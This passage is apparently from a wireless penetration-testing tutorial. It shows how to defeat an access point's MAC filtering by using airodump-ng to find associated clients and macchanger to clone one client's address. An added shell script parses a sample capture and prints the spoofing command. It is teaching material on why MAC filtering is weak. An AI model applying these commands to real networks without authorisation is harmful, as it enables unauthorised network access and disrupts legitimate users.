Let's follow the instructions to get started:

First, we use airodump-ng to find the MAC addresses of the clients connected to the access point, by issuing the following command:

airodump-ng -c 11 -a --bssid <mac> mon0

The --bssid option restricts airodump-ng to the one access point we are interested in. The -c 11 option locks the card to channel 11, the channel the access point is on; without it, airodump-ng hops across channels and will miss most of the traffic. The -a option ensures that the client section of the airodump-ng output lists only clients that are associated with an access point, so stations that are merely probing for networks are hidden. The client section now shows us the MAC addresses of all the clients associated with the access point.

Next, we change our own card's MAC address to one of those client addresses, using the macchanger utility, which ships with BackTrack:

macchanger -m <mac> wlan0

The MAC address you specify with the -m option becomes the new, spoofed MAC address of the wlan0 interface. Note that the interface must be down (ifconfig wlan0 down) while the address is changed; the driver will refuse to change the address of an interface that is up.

We monitored the air using airodump-ng and found the MAC address of a legitimate client connected to the wireless network. We then used the macchanger utility to change our wireless card's MAC address to match that client's. The access point's MAC filter now saw us as the legitimate client and allowed us onto its wireless network. This is why MAC filtering is not a security control: every client's MAC address is sent in the clear in every frame it transmits, so anyone listening on the channel can collect and clone it. One practical caveat when doing this on an engagement is that if the client you cloned is still active, the two stations now share one address and both will see their traffic disrupted, so prefer a client that has gone quiet.
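As an added example, not from the book, the two steps above can be driven from a script rather than read off the screen. airodump-ng writes its client table to a CSV file when run with -w capture in addition to the options above (producing capture-01.csv); the script below parses such a file, lists the station MACs recorded as associated with the target BSSID, and prints the macchanger command that would clone one of them. The CSV contents and all MAC addresses are a constructed sample in airodump-ng's CSV layout, not a real capture, and nothing here touches a real interface.

```shell
#!/bin/sh
# Added example (not from the book): script the MAC-filter bypass steps.
# Reads an airodump-ng CSV (as written by "airodump-ng ... -w capture"),
# prints the clients associated with a BSSID, and prints (does not run)
# the macchanger command to clone one of them onto wlan0.

# Print the MAC of every station whose BSSID column matches $2 in the
# airodump-ng CSV $1. The file has two comma-separated sections, access
# points first and then stations; unassociated stations carry
# "(not associated)" in the BSSID column, which is what -a hides on screen.
associated_clients() {
    csv="$1"
    ap=$(printf '%s' "$2" | tr 'a-f' 'A-F')
    awk -F', *' -v ap="$ap" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && NF >= 6 && toupper($6) == ap { print $1 }
    ' "$csv"
}

# Build the command that clones client MAC $1 onto interface $2. The driver
# refuses to change the address of an interface that is up, so the interface
# is taken down first and brought back up afterwards. Printed, not executed.
spoof_cmd() {
    printf 'ifconfig %s down && macchanger -m %s %s && ifconfig %s up\n' \
        "$2" "$1" "$2" "$2"
}

# Constructed sample in airodump-ng's CSV layout (not a real capture): one
# open, MAC-filtered AP on channel 11, two associated clients and one station
# that is only probing for the network.
SAMPLE_CSV=$(mktemp)
trap 'rm -f "$SAMPLE_CSV"' EXIT
cat > "$SAMPLE_CSV" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:1A:2B:3C:4D:5E, 2011-01-01 10:00:00, 2011-01-01 10:05:00, 11, 54, OPN, , , -40, 120, 0, 0. 0. 0. 0, 12, Wireless Lab, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:AA:AA:AA:AA:01, 2011-01-01 10:00:10, 2011-01-01 10:05:00, -50, 300, 02:1A:2B:3C:4D:5E, Wireless Lab
02:BB:BB:BB:BB:02, 2011-01-01 10:00:12, 2011-01-01 10:04:00, -70, 5, (not associated), Wireless Lab
02:CC:CC:CC:CC:03, 2011-01-01 10:01:00, 2011-01-01 10:05:00, -55, 120, 02:1A:2B:3C:4D:5E, 
EOF

TARGET_BSSID=02:1A:2B:3C:4D:5E
echo "Clients associated with $TARGET_BSSID:"
associated_clients "$SAMPLE_CSV" "$TARGET_BSSID"

# Take the first associated client and show how it would be cloned onto wlan0.
CLIENT=$(associated_clients "$SAMPLE_CSV" "$TARGET_BSSID" | head -n 1)
echo "To impersonate $CLIENT, run as root:"
spoof_cmd "$CLIENT" wlan0
```

On a real capture, replace the sample file with capture-01.csv and the BSSID with the one you targeted; the BSSID comparison is case-insensitive because airodump-ng writes upper-case hex while people tend to type lower-case.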
You are encouraged to explore the other options of the airodump-ng utility by going through the documentation on the project's website at http://www.aircrack-ng.org/doku.php?id=airodump-ng.